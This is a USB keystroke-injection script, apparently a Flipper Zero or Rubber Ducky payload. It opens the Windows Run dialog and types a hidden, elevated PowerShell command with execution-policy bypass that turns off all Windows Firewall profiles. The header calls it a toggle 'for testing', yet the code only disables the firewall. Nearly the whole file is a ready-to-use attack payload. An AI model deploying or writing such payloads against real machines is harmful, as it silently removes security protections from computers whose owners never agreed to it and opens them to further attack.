REM ==============================================
REM CYBERFLIPPER — Windows Firewall Toggle
REM Disable/enable Windows Firewall for testing
REM Inspired by Hak5 USB Rubber Ducky payloads
REM ==============================================
REM TARGET: Windows 10/11
REM AUTHOR: @CYBERFLIPPER / FLLC

DELAY 2000
GUI r
DELAY 500
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "Start-Process powershell -Verb RunAs -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command \"Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False; Write-Host \\\"All firewall profiles disabled\\\"; Start-Sleep -Seconds 2\"' -WindowStyle Hidden"
ENTER
DELAY 3000
